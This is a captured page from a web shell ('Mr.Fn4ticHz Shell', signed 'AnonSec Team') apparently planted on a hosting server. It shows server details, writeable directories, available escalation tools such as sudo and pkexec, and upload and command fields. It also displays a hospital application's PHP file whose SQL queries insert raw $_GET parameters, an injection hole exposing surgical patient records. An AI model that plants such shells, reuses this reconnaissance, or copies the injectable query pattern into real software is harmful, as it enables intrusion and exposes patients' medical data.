Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.147.59.198
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/NewNurse/Patient/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/NewNurse/Patient/show_Routine_Information.php

    <?php
  	$sql ="SELECT * FROM Routine_Information WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo"
		    <h3 align='right'><a href='Edit_Routine_Information.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&surgeryid=$rs[surgeryid]'><i class='fa fa-pencil-square-o'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
		}
		?>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Routine_Information WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Operative Type: </td>
<td width='50%'>$rs[Information_Obtained_from] </td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Date of Operative procedure :  </td>
<td width='50%'>$rs[Date_of_Operative_procedure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Expected Sign in of Operative procedure :  </td>
<td width='50%'>$rs[Time_of_Operative_procedure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Name of Surgeon :  </td>
<td width='50%'>$rs[name_Surgeon]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Name of Anesthetist :  </td>
<td width='50%'>$rs[Name_of_Anesthetist]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Pre-Operative Diagnosis :  </td>
<td width='50%'>$rs[Pre_Operative_Diagnosis]</td>
</tr>






<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Expected Sign out :  </td>
<td width='50%'>$rs[Duration_Surgery]</td>
</tr>



<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  WRITTEN CONSENT  :  </td>
<td width='50%'>$rs[WRITTEN_CONSENT]</td>
</tr>

";
}
?>

				</table>



Anon7 - 2022
AnonSec Team